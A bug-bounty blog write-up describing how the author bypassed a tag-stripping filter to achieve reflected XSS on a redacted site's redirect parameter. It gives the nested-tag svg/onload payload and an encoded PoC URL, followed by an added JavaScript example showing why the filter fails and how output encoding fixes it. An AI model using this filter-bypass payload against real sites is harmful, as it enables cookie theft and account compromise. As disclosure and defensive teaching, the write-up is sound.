How I bypassed Reflected XSS in a well-known platform

Iori Yagami
3 min read · Aug 29, 2022


What is an XSS attack

Cross-site scripting (XSS) is a web application vulnerability that permits an attacker to inject code (typically HTML or JavaScript) into the content of a third-party website. When a victim views an infected page on that website, the injected code executes in the victim's browser. Consequently, the attacker has bypassed the browser's same-origin policy and is able to steal private information the victim holds with that website.

What is a reflected XSS attack

Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off of a web application to the victim’s browser.

The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts. The vulnerability is typically a result of incoming requests not being sufficiently sanitized, which allows for the manipulation of a web application’s functions and the activation of malicious scripts.

To distribute the malicious link, a perpetrator typically embeds it in an email or on a third-party website (e.g., in a comment section or on social media). The link is embedded in anchor text that entices the user to click it, which sends the XSS request to the vulnerable website, reflecting the attack back to the user.

Enumeration

I didn't invest a lot in enumeration and discovery, because the bug exists in the main domain www.redacted.com.

By doing a Google dork I found a path with the parameter redirect?t=:

site:www.redacted.com inurl:redirect

I tested it for open redirection, but it didn't work. Then I checked the source code and observed that my code was there, inside a <script> </script> tag.

Exploitation of the r-XSS vulnerability

Reflected XSS bugs can be exploited to steal cookies, capture passwords and perform CSRF …

I injected my first payload, </script> alert('1') <script></script>, trying to close the script and open a malicious one, but there was a filter in place that broke all my scripts and tags (<script>, <img> …).

It took me about 2 days to figure out the right payload to bypass the filter:

</</script>script> <</svg>svg/onload=alert`xss`>//

Image: XSS payload used to bypass the filter
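To show why the nested payload above defeats a one-pass tag blacklist, and what the server should do instead, here is an added JavaScript example (not code from the original post or from the affected site). The weakStrip filter is a hypothetical reconstruction of the stripping behaviour the write-up describes, and the `target` variable and page layout are assumptions.

```javascript
// Added example, not the original site's code. weakStrip() is a
// hypothetical reconstruction of a filter that deletes blacklisted tags
// in a single, non-recursive pass.
function weakStrip(input) {
  return input.replace(/<\/?(script|svg|img)[^>]*>/gi, "");
}

// Vulnerable template (assumed): the parameter lands inside a <script>
// block as a quoted string after the filter has run.
function renderWeak(t) {
  return `<script>var target = "${weakStrip(t)}";</script>`;
}

// Hardened alternative: serialize the value as a JSON string literal and
// escape the characters the HTML parser cares about, so the value can
// never close the <script> element or start a new tag.
function jsStringLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderHardened(t) {
  return `<script>var target = ${jsStringLiteral(t)};</script>`;
}

// Detection check for a rendered page: does anything between the opening
// <script> and the final </script> break out of the script context?
function escapesScriptContext(html) {
  const inner = html.slice("<script>".length, html.lastIndexOf("</script>"));
  return /<\/script|<svg|<img/i.test(inner);
}

// Constructed sample: the nested payload from the write-up, URL-decoded.
const PAYLOAD = "</</script>script> <</svg>svg/onload=alert`xss`>//";

// One pass removes the inner </script> and </svg>, and the surrounding
// characters collapse into fresh, unfiltered tags.
console.log(weakStrip(PAYLOAD));              // </script> <svg/onload=alert`xss`>//
console.log(escapesScriptContext(renderWeak(PAYLOAD)));      // true
console.log(escapesScriptContext(renderHardened(PAYLOAD)));  // false
```

The hardened literal still round-trips to the original string inside the page's JavaScript, so correct output encoding, not tag stripping, is the fix.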

The final URL / PoC looked like:

https://www.redacted.com/iammore/redirect?t=%3C/%3C/script%3Escript%3E%20%3C%3C/svg%3Esvg/onload=alertxss%3E//

AND BOOM!! Reflected XSS!!

Image: XSS popup

I sent this report to the team, and in about 1 week the vulnerability was fixed and I was rewarded.

Never Give up

https://www.linkedin.com/in/jawad-moustadif/